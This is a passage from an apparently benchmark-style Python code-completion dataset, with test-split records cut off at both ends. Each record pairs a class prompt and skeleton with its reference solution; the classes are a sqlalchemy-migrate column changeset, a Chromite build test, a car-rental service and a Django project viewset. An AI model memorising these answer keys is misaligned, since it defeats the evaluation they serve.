table=None, *args, **kwargs):\n \"\"\"Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if 'table' not in k:\n k['table'] = self.table\n if 'engine' not in k:\n k['engine'] = k['table'].bind\n return alter_column(self, *p, **k)\n<|end_body_0|>\n\n<|body_start_1|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columngenerator')\n engine._run_visitor(visitorcallable, self, *args, **kwargs)\n if self.foreign_keys:\n for fk in self.foreign_keys:\n visitorcallable = get_engine_visitor(engine, 'columnfkgenerator')\n engine._run_visitor(visitorcallable, self, fk=fk)\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columndropper')\n engine._run_visitor(lambda dialect, conn: visitorcallable(conn), self, *args, **kwargs)\n return self\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000037", "length_bytes": 13759, "license_type": "permissive", "methods": [{"docstring": "Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.", "name": "alter", "signature": "def alter(self, *p, **k)"}, {"docstring": "Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.", "name": "create", "signature": "def create(self, table=None, *args, **kwargs)"}, {"docstring": "Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.", "name": "drop", "signature": "def drop(self, table=None, *args, **kwargs)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004653", "prompt": "Implement the Python class `ChangesetColumn` described below.\n\nClass description:\nChangeset extensions to SQLAlchemy columns\n\nMethod signatures and docstrings:\n- def alter(self, *p, **k): Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\n- def create(self, table=None, *args, **kwargs): Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.\n- def drop(self, table=None, *args, **kwargs): Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.", "prompted_full_text": "Implement the Python class `ChangesetColumn` described below.\n\nClass description:\nChangeset extensions to SQLAlchemy columns\n\nMethod signatures and docstrings:\n- def alter(self, *p, **k): Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\n- def create(self, table=None, *args, **kwargs): Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.\n- def drop(self, table=None, *args, **kwargs): Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.\n\n<|skeleton|>\nclass ChangesetColumn:\n \"\"\"Changeset extensions to SQLAlchemy columns\"\"\"\n\n def alter(self, *p, **k):\n \"\"\"Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\"\"\"\n <|body_0|>\n\n def create(self, table=None, *args, **kwargs):\n \"\"\"Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.\"\"\"\n <|body_1|>\n\n def drop(self, table=None, *args, **kwargs):\n \"\"\"Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if 'table' not in k:\n k['table'] = self.table\n if 'engine' not in k:\n k['engine'] = k['table'].bind\n return alter_column(self, *p, **k)\n<|end_body_0|>\n\n<|body_start_1|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columngenerator')\n engine._run_visitor(visitorcallable, self, *args, **kwargs)\n if self.foreign_keys:\n for fk in self.foreign_keys:\n visitorcallable = get_engine_visitor(engine, 'columnfkgenerator')\n engine._run_visitor(visitorcallable, self, fk=fk)\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columndropper')\n engine._run_visitor(lambda dialect, conn: visitorcallable(conn), self, *args, **kwargs)\n return self\n<|end_body_2|>\n", "revision_id": "3c44ecaf4b2e1f2d7269eabef19cbd2e88b3a99c", "skeleton": "<|skeleton|>\nclass ChangesetColumn:\n \"\"\"Changeset extensions to SQLAlchemy columns\"\"\"\n\n def alter(self, *p, **k):\n \"\"\"Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\"\"\"\n <|body_0|>\n\n def create(self, table=None, *args, **kwargs):\n \"\"\"Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.\"\"\"\n <|body_1|>\n\n def drop(self, table=None, *args, **kwargs):\n \"\"\"Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ChangesetColumn:\n \"\"\"Changeset extensions to SQLAlchemy columns\"\"\"\n\n def alter(self, *p, **k):\n \"\"\"Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\"\"\"\n if 'table' not in k:\n k['table'] = self.table\n if 'engine' not in k:\n k['engine'] = k['table'].bind\n return alter_column(self, *p, **k)\n\n def create(self, table=None, *args, **kwargs):\n \"\"\"Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.\"\"\"\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columngenerator')\n engine._run_visitor(visitorcallable, self, *args, **kwargs)\n if self.foreign_keys:\n for fk in self.foreign_keys:\n visitorcallable = get_engine_visitor(engine, 'columnfkgenerator')\n engine._run_visitor(visitorcallable, self, fk=fk)\n return self\n\n def drop(self, table=None, *args, **kwargs):\n \"\"\"Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.\"\"\"\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columndropper')\n engine._run_visitor(lambda dialect, conn: visitorcallable(conn), self, *args, **kwargs)\n return self\n", "source": "the_stack_v2_python_sparse", "source_path": "eggs/sqlalchemy_migrate-0.5.4-py2.7.egg/migrate/changeset/schema.py", "source_repo": "JCVI-Cloud/galaxy-tools-prok", "split": "test", "star_events_count": 0} {"blob_id": "c72430c1dae49d4ab1fb960fe3cbfcbb7732bb96", "bodies": ["cmd = ['--board=randonname', 'power_manager']\nself.PatchObject(workon_helper, 'WorkonHelper')\nself.PatchObject(command, 'UseProgressBar', return_value=True)\nwith MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertTrue(operation_run.called)", "cmd = ['--board=randonname', 'power_manager']\nself.PatchObject(workon_helper, 'WorkonHelper')\nself.PatchObject(command, 'UseProgressBar', return_value=False)\nwith MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertFalse(operation_run.called)", "cmds = [['--host', 'power_manager'], ['--board=randomname', 'power_manager'], ['--board=randomname', '--debug', 'power_manager'], ['--board=randomname', '--no-deps', 'power_manager'], ['--board=randomname', '--no-chroot-update', 'power_manager'], ['--board=randomname', '--no-enable-only-latest', 'power_manager']]\nfor cmd in cmds:\n update_chroot = not ('--no-deps' in cmd or '--no-chroot-update' in cmd)\n enable_only_latest = '--no-enable-only-latest' not in cmd\n fake_workon_helper = FakeWorkonHelper()\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=fake_workon_helper)\n with MockBuildCommand(cmd) as build:\n build.inst.Run()\n self.assertEquals(1 if update_chroot else 0, build.chroot_update_called)\n self.assertEquals(1 if enable_only_latest else 0, fake_workon_helper.start_called)\n self.assertEquals(True if enable_only_latest else None, fake_workon_helper.use_workon_only)", "args = ['--board=randomname', 'power_manager']\nself.PatchObject(workon_helper, 'WorkonHelper', return_value=FakeWorkonHelper())\nwith MockBuildCommand(args) as build:\n cmd = partial_mock.In('--backtrack=0')\n build.rc_mock.AddCmdResult(cmd=cmd, returncode=1, error='error\\n')\n with self.OutputCapturer():\n try:\n build.inst.Run()\n except Exception as e:\n logging.error(e)\n self.AssertOutputContainsError(cros_build.BuildCommand._BAD_DEPEND_MSG, check_stderr=True)"], "bodies_text": "<|body_start_0|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=True)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertTrue(operation_run.called)\n<|end_body_0|>\n\n<|body_start_1|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=False)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertFalse(operation_run.called)\n<|end_body_1|>\n\n<|body_start_2|>\n cmds = [['--host', 'power_manager'], ['--board=randomname', 'power_manager'], ['--board=randomname', '--debug', 'power_manager'], ['--board=randomname', '--no-deps', 'power_manager'], ['--board=randomname', '--no-chroot-update', 'power_manager'], ['--board=randomname', '--no-enable-only-latest', 'power_manager']]\n for cmd in cmds:\n update_chroot = not ('--no-deps' in cmd or '--no-chroot-update' in cmd)\n enable_only_latest = '--no-enable-only-latest' not in cmd\n fake_workon_helper = FakeWorkonHelper()\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=fake_workon_helper)\n with MockBuildCommand(cmd) as build:\n build.inst.Run()\n self.assertEquals(1 if update_chroot else 0, build.chroot_update_called)\n self.assertEquals(1 if enable_only_latest else 0, fake_workon_helper.start_called)\n self.assertEquals(True if enable_only_latest else None, fake_workon_helper.use_workon_only)\n<|end_body_2|>\n\n<|body_start_3|>\n args = ['--board=randomname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=FakeWorkonHelper())\n with MockBuildCommand(args) as build:\n cmd = partial_mock.In('--backtrack=0')\n build.rc_mock.AddCmdResult(cmd=cmd, returncode=1, error='error\\n')\n with self.OutputCapturer():\n try:\n build.inst.Run()\n except Exception as e:\n logging.error(e)\n self.AssertOutputContainsError(cros_build.BuildCommand._BAD_DEPEND_MSG, check_stderr=True)\n<|end_body_3|>\n", "class_docstring": "Test class for our BuildCommand class.", "class_name": "BuildCommandTest", "detected_licenses": ["BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference", "LGPL-2.0-or-later", "GPL-1.0-or-later", "MIT", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BuildCommandTest:\n \"\"\"Test class for our BuildCommand class.\"\"\"\n\n def testBrilloBuildOperationCalled(self):\n \"\"\"Test that BrilloBuildOperation is used when appropriate.\"\"\"\n <|body_0|>\n\n def testBrilloBuildOperationNotCalled(self):\n \"\"\"Test that BrilloBuildOperation is not used when it shouldn't be.\"\"\"\n <|body_1|>\n\n def testSuccess(self):\n \"\"\"Test that successful commands work.\"\"\"\n <|body_2|>\n\n def testFailedDeps(self):\n \"\"\"Test that failures are detected correctly.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=True)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertTrue(operation_run.called)\n<|end_body_0|>\n\n<|body_start_1|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=False)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertFalse(operation_run.called)\n<|end_body_1|>\n\n<|body_start_2|>\n cmds = [['--host', 'power_manager'], ['--board=randomname', 'power_manager'], ['--board=randomname', '--debug', 'power_manager'], ['--board=randomname', '--no-deps', 'power_manager'], ['--board=randomname', '--no-chroot-update', 'power_manager'], ['--board=randomname', '--no-enable-only-latest', 'power_manager']]\n for cmd in cmds:\n update_chroot = not ('--no-deps' in cmd or '--no-chroot-update' in cmd)\n enable_only_latest = '--no-enable-only-latest' not in cmd\n fake_workon_helper = FakeWorkonHelper()\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=fake_workon_helper)\n with MockBuildCommand(cmd) as build:\n build.inst.Run()\n self.assertEquals(1 if update_chroot else 0, build.chroot_update_called)\n self.assertEquals(1 if enable_only_latest else 0, fake_workon_helper.start_called)\n self.assertEquals(True if enable_only_latest else None, fake_workon_helper.use_workon_only)\n<|end_body_2|>\n\n<|body_start_3|>\n args = ['--board=randomname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=FakeWorkonHelper())\n with MockBuildCommand(args) as build:\n cmd = partial_mock.In('--backtrack=0')\n build.rc_mock.AddCmdResult(cmd=cmd, returncode=1, error='error\\n')\n with self.OutputCapturer():\n try:\n build.inst.Run()\n except Exception as e:\n logging.error(e)\n self.AssertOutputContainsError(cros_build.BuildCommand._BAD_DEPEND_MSG, check_stderr=True)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000038", "length_bytes": 4632, "license_type": "permissive", "methods": [{"docstring": "Test that BrilloBuildOperation is used when appropriate.", "name": "testBrilloBuildOperationCalled", "signature": "def testBrilloBuildOperationCalled(self)"}, {"docstring": "Test that BrilloBuildOperation is not used when it shouldn't be.", "name": "testBrilloBuildOperationNotCalled", "signature": "def testBrilloBuildOperationNotCalled(self)"}, {"docstring": "Test that successful commands work.", "name": "testSuccess", "signature": "def testSuccess(self)"}, {"docstring": "Test that failures are detected correctly.", "name": "testFailedDeps", "signature": "def testFailedDeps(self)"}], "n_methods": 4, "prompt": "Implement the Python class `BuildCommandTest` described below.\n\nClass description:\nTest class for our BuildCommand class.\n\nMethod signatures and docstrings:\n- def testBrilloBuildOperationCalled(self): Test that BrilloBuildOperation is used when appropriate.\n- def testBrilloBuildOperationNotCalled(self): Test that BrilloBuildOperation is not used when it shouldn't be.\n- def testSuccess(self): Test that successful commands work.\n- def testFailedDeps(self): Test that failures are detected correctly.", "prompted_full_text": "Implement the Python class `BuildCommandTest` described below.\n\nClass description:\nTest class for our BuildCommand class.\n\nMethod signatures and docstrings:\n- def testBrilloBuildOperationCalled(self): Test that BrilloBuildOperation is used when appropriate.\n- def testBrilloBuildOperationNotCalled(self): Test that BrilloBuildOperation is not used when it shouldn't be.\n- def testSuccess(self): Test that successful commands work.\n- def testFailedDeps(self): Test that failures are detected correctly.\n\n<|skeleton|>\nclass BuildCommandTest:\n \"\"\"Test class for our BuildCommand class.\"\"\"\n\n def testBrilloBuildOperationCalled(self):\n \"\"\"Test that BrilloBuildOperation is used when appropriate.\"\"\"\n <|body_0|>\n\n def testBrilloBuildOperationNotCalled(self):\n \"\"\"Test that BrilloBuildOperation is not used when it shouldn't be.\"\"\"\n <|body_1|>\n\n def testSuccess(self):\n \"\"\"Test that successful commands work.\"\"\"\n <|body_2|>\n\n def testFailedDeps(self):\n \"\"\"Test that failures are detected correctly.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=True)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertTrue(operation_run.called)\n<|end_body_0|>\n\n<|body_start_1|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=False)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertFalse(operation_run.called)\n<|end_body_1|>\n\n<|body_start_2|>\n cmds = [['--host', 'power_manager'], ['--board=randomname', 'power_manager'], ['--board=randomname', '--debug', 'power_manager'], ['--board=randomname', '--no-deps', 'power_manager'], ['--board=randomname', '--no-chroot-update', 'power_manager'], ['--board=randomname', '--no-enable-only-latest', 'power_manager']]\n for cmd in cmds:\n update_chroot = not ('--no-deps' in cmd or '--no-chroot-update' in cmd)\n enable_only_latest = '--no-enable-only-latest' not in cmd\n fake_workon_helper = FakeWorkonHelper()\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=fake_workon_helper)\n with MockBuildCommand(cmd) as build:\n build.inst.Run()\n self.assertEquals(1 if update_chroot else 0, build.chroot_update_called)\n self.assertEquals(1 if enable_only_latest else 0, fake_workon_helper.start_called)\n self.assertEquals(True if enable_only_latest else None, fake_workon_helper.use_workon_only)\n<|end_body_2|>\n\n<|body_start_3|>\n args = ['--board=randomname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=FakeWorkonHelper())\n with MockBuildCommand(args) as build:\n cmd = partial_mock.In('--backtrack=0')\n build.rc_mock.AddCmdResult(cmd=cmd, returncode=1, error='error\\n')\n with self.OutputCapturer():\n try:\n build.inst.Run()\n except Exception as e:\n logging.error(e)\n self.AssertOutputContainsError(cros_build.BuildCommand._BAD_DEPEND_MSG, check_stderr=True)\n<|end_body_3|>\n", "revision_id": "72a05af97787001756bae2511b7985e61498c965", "skeleton": "<|skeleton|>\nclass BuildCommandTest:\n \"\"\"Test class for our BuildCommand class.\"\"\"\n\n def testBrilloBuildOperationCalled(self):\n \"\"\"Test that BrilloBuildOperation is used when appropriate.\"\"\"\n <|body_0|>\n\n def testBrilloBuildOperationNotCalled(self):\n \"\"\"Test that BrilloBuildOperation is not used when it shouldn't be.\"\"\"\n <|body_1|>\n\n def testSuccess(self):\n \"\"\"Test that successful commands work.\"\"\"\n <|body_2|>\n\n def testFailedDeps(self):\n \"\"\"Test that failures are detected correctly.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BuildCommandTest:\n \"\"\"Test class for our BuildCommand class.\"\"\"\n\n def testBrilloBuildOperationCalled(self):\n \"\"\"Test that BrilloBuildOperation is used when appropriate.\"\"\"\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=True)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertTrue(operation_run.called)\n\n def testBrilloBuildOperationNotCalled(self):\n \"\"\"Test that BrilloBuildOperation is not used when it shouldn't be.\"\"\"\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=False)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertFalse(operation_run.called)\n\n def testSuccess(self):\n \"\"\"Test that successful commands work.\"\"\"\n cmds = [['--host', 'power_manager'], ['--board=randomname', 'power_manager'], ['--board=randomname', '--debug', 'power_manager'], ['--board=randomname', '--no-deps', 'power_manager'], ['--board=randomname', '--no-chroot-update', 'power_manager'], ['--board=randomname', '--no-enable-only-latest', 'power_manager']]\n for cmd in cmds:\n update_chroot = not ('--no-deps' in cmd or '--no-chroot-update' in cmd)\n enable_only_latest = '--no-enable-only-latest' not in cmd\n fake_workon_helper = FakeWorkonHelper()\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=fake_workon_helper)\n with MockBuildCommand(cmd) as build:\n build.inst.Run()\n self.assertEquals(1 if update_chroot else 0, build.chroot_update_called)\n self.assertEquals(1 if enable_only_latest else 0, fake_workon_helper.start_called)\n self.assertEquals(True if enable_only_latest else None, fake_workon_helper.use_workon_only)\n\n def testFailedDeps(self):\n \"\"\"Test that failures are detected correctly.\"\"\"\n args = ['--board=randomname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=FakeWorkonHelper())\n with MockBuildCommand(args) as build:\n cmd = partial_mock.In('--backtrack=0')\n build.rc_mock.AddCmdResult(cmd=cmd, returncode=1, error='error\\n')\n with self.OutputCapturer():\n try:\n build.inst.Run()\n except Exception as e:\n logging.error(e)\n self.AssertOutputContainsError(cros_build.BuildCommand._BAD_DEPEND_MSG, check_stderr=True)\n", "source": "the_stack_v2_python_sparse", "source_path": "third_party/chromite/cli/cros/cros_build_unittest.py", "source_repo": "metux/chromium-suckless", "split": "test", "star_events_count": 5} {"blob_id": "5b13fffd940cacac656b8504e7f9c5c0d540b991", "bodies": ["available_cars = []\nall_cars = self.get_full_content()\nfor car in all_cars:\n if not car.is_booked():\n available_cars.append(car)\nreturn available_cars", "booked_cars = []\nall_cars = self.get_full_content()\nfor car in all_cars:\n if car.is_booked():\n booked_cars.append(car)\nreturn booked_cars"], "bodies_text": "<|body_start_0|>\n available_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if not car.is_booked():\n available_cars.append(car)\n return available_cars\n<|end_body_0|>\n\n<|body_start_1|>\n booked_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if car.is_booked():\n booked_cars.append(car)\n return booked_cars\n<|end_body_1|>\n", "class_docstring": "", "class_name": "CarService", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CarService:\n\n def get_available_cars(self):\n \"\"\"Saekir alla bila sem eru ekki i leigu og skilar theim\"\"\"\n <|body_0|>\n\n def get_booked_cars(self):\n \"\"\"Saekir alla bila sem eru i leigu og skilar theim\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n available_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if not car.is_booked():\n available_cars.append(car)\n return available_cars\n<|end_body_0|>\n\n<|body_start_1|>\n booked_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if car.is_booked():\n booked_cars.append(car)\n return booked_cars\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000039", "length_bytes": 836, "license_type": "no_license", "methods": [{"docstring": "Saekir alla bila sem eru ekki i leigu og skilar theim", "name": "get_available_cars", "signature": "def get_available_cars(self)"}, {"docstring": "Saekir alla bila sem eru i leigu og skilar theim", "name": "get_booked_cars", "signature": "def get_booked_cars(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005669", "prompt": "Implement the Python class `CarService` described below.\n\nClass description:\nImplement the CarService class.\n\nMethod signatures and docstrings:\n- def get_available_cars(self): Saekir alla bila sem eru ekki i leigu og skilar theim\n- def get_booked_cars(self): Saekir alla bila sem eru i leigu og skilar theim", "prompted_full_text": "Implement the Python class `CarService` described below.\n\nClass description:\nImplement the CarService class.\n\nMethod signatures and docstrings:\n- def get_available_cars(self): Saekir alla bila sem eru ekki i leigu og skilar theim\n- def get_booked_cars(self): Saekir alla bila sem eru i leigu og skilar theim\n\n<|skeleton|>\nclass CarService:\n\n def get_available_cars(self):\n \"\"\"Saekir alla bila sem eru ekki i leigu og skilar theim\"\"\"\n <|body_0|>\n\n def get_booked_cars(self):\n \"\"\"Saekir alla bila sem eru i leigu og skilar theim\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n available_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if not car.is_booked():\n available_cars.append(car)\n return available_cars\n<|end_body_0|>\n\n<|body_start_1|>\n booked_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if car.is_booked():\n booked_cars.append(car)\n return booked_cars\n<|end_body_1|>\n", "revision_id": "c9533d91081ab5ac34467e367d10efc1c1c75746", "skeleton": "<|skeleton|>\nclass CarService:\n\n def get_available_cars(self):\n \"\"\"Saekir alla bila sem eru ekki i leigu og skilar theim\"\"\"\n <|body_0|>\n\n def get_booked_cars(self):\n \"\"\"Saekir alla bila sem eru i leigu og skilar theim\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CarService:\n def get_available_cars(self):\n \"\"\"Saekir alla bila sem eru ekki i leigu og skilar theim\"\"\"\n available_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if not car.is_booked():\n available_cars.append(car)\n return available_cars\n\n def get_booked_cars(self):\n \"\"\"Saekir alla bila sem eru i leigu og skilar theim\"\"\"\n booked_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if car.is_booked():\n booked_cars.append(car)\n return booked_cars\n", "source": "the_stack_v2_python_sparse", "source_path": "services/CarService.py", "source_repo": "superhetja/verkefni1", "split": "test", "star_events_count": 0} {"blob_id": "f80028f432062fd25b47322822d8adbb095ae004", "bodies": ["try:\n project_obj = self.get_object()\n part_id = request.query_params.get('part_id') or None\n part_name = request.query_params.get('part_name') or None\n if part_id is not None:\n project_obj.delete_tag_by_id(tag_id=part_id)\n return Response({'status': 'ok'})\n if part_name is not None:\n project_obj.delete_tag_by_name(tag_name=part_name)\n return Response({'status': 'ok'})\n raise AttributeError('part_name or part_id not found')\nexcept AttributeError as attr_err:\n return Response({'status': 'failed', 'log': str(attr_err)}, status=status.HTTP_400_BAD_REQUEST)\nexcept CustomVisionErrorException as customvision_err:\n return Response({'status': 'failed', 'log': str(customvision_err)}, status=status.HTTP_503_SERVICE_UNAVAILABLE)", "queryset = self.get_queryset()\nobj = get_object_or_404(queryset, pk=pk)\nobj.relabel_expired_time = timezone.now() + datetime.timedelta(seconds=PROJECT_RELABEL_TIME_THRESHOLD)\nobj.save()\nserializer = ProjectSerializer(obj)\nreturn Response(serializer.data)"], "bodies_text": "<|body_start_0|>\n try:\n project_obj = self.get_object()\n part_id = request.query_params.get('part_id') or None\n part_name = request.query_params.get('part_name') or None\n if part_id is not None:\n project_obj.delete_tag_by_id(tag_id=part_id)\n return Response({'status': 'ok'})\n if part_name is not None:\n project_obj.delete_tag_by_name(tag_name=part_name)\n return Response({'status': 'ok'})\n raise AttributeError('part_name or part_id not found')\n except AttributeError as attr_err:\n return Response({'status': 'failed', 'log': str(attr_err)}, status=status.HTTP_400_BAD_REQUEST)\n except CustomVisionErrorException as customvision_err:\n return Response({'status': 'failed', 'log': str(customvision_err)}, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n obj = get_object_or_404(queryset, pk=pk)\n obj.relabel_expired_time = timezone.now() + datetime.timedelta(seconds=PROJECT_RELABEL_TIME_THRESHOLD)\n obj.save()\n serializer = ProjectSerializer(obj)\n return Response(serializer.data)\n<|end_body_1|>\n", "class_docstring": "Project ModelViewSet Filters: is_demo", "class_name": "ProjectViewSet", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProjectViewSet:\n \"\"\"Project ModelViewSet Filters: is_demo\"\"\"\n\n def delete_tag(self, request, pk=None):\n \"\"\"delete tag\"\"\"\n <|body_0|>\n\n def relabel_keep_alive(self, request, pk=None) -> Response:\n \"\"\"relabel_keep_alive. Args: request: kwargs: Returns: Response: Return project with updated timestamp\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n project_obj = self.get_object()\n part_id = request.query_params.get('part_id') or None\n part_name = request.query_params.get('part_name') or None\n if part_id is not None:\n project_obj.delete_tag_by_id(tag_id=part_id)\n return Response({'status': 'ok'})\n if part_name is not None:\n project_obj.delete_tag_by_name(tag_name=part_name)\n return Response({'status': 'ok'})\n raise AttributeError('part_name or part_id not found')\n except AttributeError as attr_err:\n return Response({'status': 'failed', 'log': str(attr_err)}, status=status.HTTP_400_BAD_REQUEST)\n except 